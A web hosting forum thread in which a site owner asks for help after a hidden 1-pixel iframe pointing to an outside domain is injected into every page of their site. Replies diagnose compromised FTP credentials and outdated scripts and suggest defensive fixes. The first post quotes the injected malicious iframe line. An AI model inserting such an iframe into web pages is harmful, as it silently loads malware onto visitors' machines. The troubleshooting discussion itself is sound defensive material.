Results 1 to 12 of 12
  1. #1

    Virus Attack - Website Blocked!

    Hello, Google tells us following code in our every page. We have tried to remove this code but this is added automatically within seconds. Google has also blocked our main website temporary for public.

    Please advise,

    --
    Code:
    --
    <iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
    Last edited by AJKservers; 01-01-2011 at 02:27 AM.

  2. #2
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,251
    Is this a shared hosting account? if so contact your host

    If it is a a dedicated server or vps, then you have some malicious activity going on with the server and it needs to be investigated. It could be happening through a backdoor, php shell, or even through ftp.

    Can you give us more information please?
    Steven Ciaburri | Proactive Linux Server Management - Rack911.com
    System Administration Extraordinaire | Follow us on twitter:@Rack911Labs
    Managed Servers (AS62710), Server Management, and Security Auditing.
    www.HostingSecList.com - Security notices for the hosting community.

  3. #3
    Quote Originally Posted by Steven View Post
    Is this a shared hosting account? if so contact your host

    If it is a a dedicated server or vps, then you have some malicious activity going on with the server and it needs to be investigated. It could be happening through a backdoor, php shell, or even through ftp.

    Can you give us more information please?
    There are many of our websites running on the same server. It's a dedicated server running cPanel/WHM. ONLY, our main website is affected http://www.AJKservers.co.uk

    I do not have any more information at the moment as we just noticed this activity and posted here for comments and advices to prevent from this kind of activities. I would need to find the source of this code, but I don't know where to start
    Last edited by AJKservers; 01-01-2011 at 02:36 AM.

  4. #4
    Hello AJKservers,

    I think that check your code again. because of your computer infected by virus and it infected to your html file.

    please try.

  5. #5
    Quote Originally Posted by steven_elvisda View Post
    Hello AJKservers,

    I think that check your code again. because of your computer infected by virus and it infected to your html file.

    please try.
    You're right, but I have already re-installed OS, updating windows, windows defender and other anti applications. Trying to remove code from ever page again, and I hope, it won't happen again.

    Thank for your comments guys.

  6. #6
    Quote Originally Posted by AJKservers View Post
    You're right, but I have already re-installed OS
    Re-installed OS of your server OR local machine? Such injections are performed via Ftp OR a compromised script on your server. Re-installing the server OS and removing 'iframe' code won't make any difference if the compromised script is still under your account.

    If the injection is performed by hacking the Ftp password, re-installing your local machine would sort out the things for you. For now. But make sure you install a firewall and limit ftp access to your own IPs so such issues can be minimized.
    | LinuxHostingSupport.net
    | Server Setup | Security | Optimization | Troubleshooting | Server Migration
    | Monthly and Task basis services.
    | MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux

  7. #7
    Quote Originally Posted by madaboutlinux View Post
    Re-installed OS of your server OR local machine? Such injections are performed via Ftp OR a compromised script on your server. Re-installing the server OS and removing 'iframe' code won't make any difference if the compromised script is still under your account.

    If the injection is performed by hacking the Ftp password, re-installing your local machine would sort out the things for you. For now. But make sure you install a firewall and limit ftp access to your own IPs so such issues can be minimized.
    Actually, the website was infected from our own local computer via FTP. There was no third party involved. However, the management of the server has also been notified at the time to take further security measures.

    Anyways, I appreciate your response to this thread, madaboutlinux.

  8. #8
    Join Date
    Sep 2010
    Location
    Bangladesh
    Posts
    84
    This is happening when someone use any nulled version of scripts.
    Shared Hosting by Hosting Divine
    Fast, Affordable & Reliable Web Hosting
    24/7 365 Support, 99.99% Network Up-time Guarantee

  9. #9
    Join Date
    Mar 2009
    Location
    Miami, Florida
    Posts
    18,857
    Quote Originally Posted by onnoysomoy View Post
    This is happening when someone use any nulled version of scripts.
    Hello,
    Actually this happens more with people using outdated scripts with known exploits (PSA for those who are using a 3 year old version of WordPress or Joomla ). Nulled scripts are more notorious for Data Leaks or Backdoors.
    Keith I Myers
    CEO and Founder - RemoteRAM.com
    The world leader in Cloud Based RAM
    KMyers.me The rantings of a lunatic

  10. #10
    Join Date
    Mar 2009
    Location
    Austin Tx
    Posts
    1,982
    The most usual attack is from sniffed FTP passwords in this form of iframe attack.
    First off, either your machine is being sniffed, or someone allowed an insecure script that let in someone to run a plain text sniffer.

    At the least, you will need to change the ftp passes, but after you are sure the sniffer is gone, or do it locally if you are sure it's network based.
    Better, switch from the insecure ftp to at least sftp that can be encrypted, and not sniffed.

    I've seen, literally, about 20 different ways the ftp password was compromised...weak passes (bruteforce attacks), sniffers, compromised configs (containing passes), "notes" left in bad places...

    Most of these are hacked either with close-network password sniffs, or a bad script on someones web site that allowed an upload and execution of a local sniffer (usually an old or mis-configed Wordpress or Joomla, as KDisk said), but probably 95% chance this has to do with a compromised FTP password.
    This is the best signature in the world....Tribute!
    (It is not the best signature in the world, no. This is just a tribute)

  11. #11
    Quote Originally Posted by KDisk View Post
    Hello,
    Actually this happens more with people using outdated scripts with known exploits (PSA for those who are using a 3 year old version of WordPress or Joomla ). Nulled scripts are more notorious for Data Leaks or Backdoors.
    Hello AJKservers,

    I agree with these ideas. Please check your cms component or check your code especially your javascript code. Sometime you copy some verify code of jquery or ajax it will harmful your website. one other thing, I suggest you to use protocol FTPES on your filezilla ftp client to upload your file.

  12. #12
    We never used nulled scripts, softwares on our local computers were outdated, windows defender and antivirus softwares were also outdated.

    Thank you guys for your comments and suggestions. We have updated all scripts, including CMS, forums etc etc , secured local computer, secured sever, changed passwords, and removed iframe from pages.

    Google has also unblocked our website within 3 hours of doing all things. It's now over 35 hours and everything is going good.

  13. Newsletters

    Subscribe Now & Get The WHT Quick Start Guide!

Similar Threads

  1. Phishing Attack: Site now blocked by D-Link Routers
    By Exitof99 in forum Hosting Security and Technology
    Replies: 7
    Last Post: 09-30-2010, 10:22 AM
  2. HTML Frammer Virus Attack On Website : Please Help
    By techbongo in forum Hosting Security and Technology
    Replies: 5
    Last Post: 06-11-2009, 02:45 PM
  3. possible attack or virus?
    By torwill in forum Hosting Security and Technology
    Replies: 3
    Last Post: 07-07-2004, 01:41 AM
  4. Massive Virus Attack
    By Artashes in forum Web Hosting
    Replies: 18
    Last Post: 04-12-2003, 01:50 PM
  5. Virus Attack??
    By VetteMan in forum Hosting Security and Technology
    Replies: 0
    Last Post: 04-28-2001, 03:45 AM

Related Posts from theWHIR.com

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •